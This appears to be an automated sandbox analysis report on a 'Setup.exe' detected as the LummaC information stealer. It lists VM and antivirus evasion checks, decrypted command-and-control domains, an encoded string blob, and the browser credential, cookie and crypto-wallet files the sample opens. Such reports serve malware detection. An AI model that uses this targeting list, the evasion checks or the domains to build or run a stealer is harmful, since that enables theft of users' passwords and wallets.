Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: Setup.exe

Static file information: File size 74566691 > 1048576

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress,

0_2_0044C030

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00409954 push 00409991h; ret	0_2_00409989
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0040A04F push ds; ret	0_2_0040A050
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0040A023 push ds; ret	0_2_0040A04D
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004062CC push ecx; mov dword ptr [esp], eax	0_2_004062CD
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004824F8 push 004825D6h; ret	0_2_004825CE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004106E0 push ecx; mov dword ptr [esp], edx	0_2_004106E5
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00476724 push ecx; mov dword ptr [esp], edx	0_2_00476725
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00412938 push 0041299Bh; ret	0_2_00412993
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00458AF0 push 00458B34h; ret	0_2_00458B2C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00442C94 push ecx; mov dword ptr [esp], ecx	0_2_00442C98
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00450E68 push 00450E9Bh; ret	0_2_00450E93
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0045102C push ecx; mov dword ptr [esp], eax	0_2_00451031
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0040D038 push ecx; mov dword ptr [esp], edx	0_2_0040D03A
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004572B0 push 004572E8h; ret	0_2_004572E0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00493310 push ecx; mov dword ptr [esp], ecx	0_2_00493315
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0040546D push eax; ret	0_2_004054A9
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0045F544 push ecx; mov dword ptr [esp], ecx	0_2_0045F548
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0040553D push 00405749h; ret	0_2_00405741
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0040F598 push ecx; mov dword ptr [esp], edx	0_2_0040F59A
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004055BE push 00405749h; ret	0_2_00405741
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0040563B push 00405749h; ret	0_2_00405741
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004056A0 push 00405749h; ret	0_2_00405741
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00483B8C push ecx; mov dword ptr [esp], ecx	0_2_00483B91
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00419C38 push ecx; mov dword ptr [esp], ecx	0_2_00419C3D
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FDC52E push eax; mov dword ptr [esp], 898A8B8Ch	0_2_02FDC53D
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FDF1BE push eax; mov dword ptr [esp], E9E8E7B6h	0_2_02FDF1C3

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	0_2_00423C1C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	0_2_00423C1C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004241EC IsIconic,SetActiveWindow,SetFocus,	0_2_004241EC
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004241A4 IsIconic,SetActiveWindow,	0_2_004241A4
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	0_2_00418394
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	0_2_0042286C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004175A8 IsIconic,GetCapture,	0_2_004175A8
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00417CDE IsIconic,SetWindowPos,	0_2_00417CDE
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	0_2_00417CE0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00481EB4 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,	0_2_00481EB4

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_0044AEAC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0044AEAC

Source: C:\Users\user\Desktop\Setup.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\Setup.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

API coverage: 3.8 %

Source: C:\Users\user\Desktop\Setup.exe TID: 5576	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe TID: 5576	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00474078 FindFirstFileA,FindNextFileA,FindClose,	0_2_00474078
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00461F78 FindFirstFileA,FindNextFileA,FindClose,	0_2_00461F78
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004520D0 FindFirstFileA,GetLastError,	0_2_004520D0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_0049676C FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,	0_2_0049676C
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00463504 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	0_2_00463504
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00463980 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	0_2_00463980
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00461F78 FindFirstFileA,FindNextFileA,FindClose,	0_2_00461F78

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00481FF4 GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcAddress,GetModuleHandleA,GetProcAddress,GetSystemInfo,

0_2_00481FF4

Source: Setup.exe, 00000000.00000003.1958884457.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2050988322.00000000005B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2080291766.000000000057D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1959013995.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2080291766.00000000005AC000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2029575084.00000000005B6000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Setup.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress,

0_2_0044C030

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FA03B1 mov edx, dword ptr fs:[00000030h]	0_2_02FA03B1
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FA0971 mov eax, dword ptr fs:[00000030h]	0_2_02FA0971
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FA0FC0 mov eax, dword ptr fs:[00000030h]	0_2_02FA0FC0
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FA0FC1 mov eax, dword ptr fs:[00000030h]	0_2_02FA0FC1
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_02FA0D21 mov eax, dword ptr fs:[00000030h]	0_2_02FA0D21

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Setup.exe	String found in binary or memory: bashfulacid.lat
Source: Setup.exe	String found in binary or memory: tentabatte.lat
Source: Setup.exe	String found in binary or memory: wordyfindy.lat
Source: Setup.exe	String found in binary or memory: slipperyloo.lat
Source: Setup.exe	String found in binary or memory: wellofflyric.click
Source: Setup.exe	String found in binary or memory: talkynicer.lat
Source: Setup.exe	String found in binary or memory: curverpluch.lat
Source: Setup.exe	String found in binary or memory: manyrestro.lat
Source: Setup.exe	String found in binary or memory: shapestickyr.lat

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00477120 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,

0_2_00477120

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_0045C3E0 GetVersion,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,AllocateAndInitializeSid,GetLastError,LocalFree,

0_2_0045C3E0

Source: C:\Users\user\Desktop\Setup.exe	Code function: GetLocaleInfoA,		0_2_00408570
Source: C:\Users\user\Desktop\Setup.exe	Code function: GetLocaleInfoA,		0_2_004085BC

Source: C:\Users\user\Desktop\Setup.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00457DE8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,

0_2_00457DE8

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_0046E060 GetLocalTime,

0_2_0046E060

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00454AC8 GetUserNameA,

0_2_00454AC8

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00482320 GetVersionExA,GetVersionExA,

0_2_00482320

Source: C:\Users\user\Desktop\Setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Setup.exe, 00000000.00000003.2050855796.000000000061E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2050988322.00000000005B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2080291766.00000000005AC000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\Setup.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Setup.exe PID: 6996, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Setup.exe, 00000000.00000003.2004466883.0000000000609000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: Setup.exe, 00000000.00000003.2050988322.00000000005B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: Setup.exe, 00000000.00000003.1958998471.0000000000605000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 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
Source: Setup.exe, 00000000.00000003.2050988322.00000000005B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Setup.exe, 00000000.00000003.2050988322.00000000005B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Setup.exe, 00000000.00000003.2050988322.00000000005B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: Setup.exe, 00000000.00000003.2050988322.00000000005B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: Setup.exe, 00000000.00000003.2004466883.0000000000609000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsl
Source: Setup.exe, 00000000.00000003.2004466883.0000000000609000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Lives

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
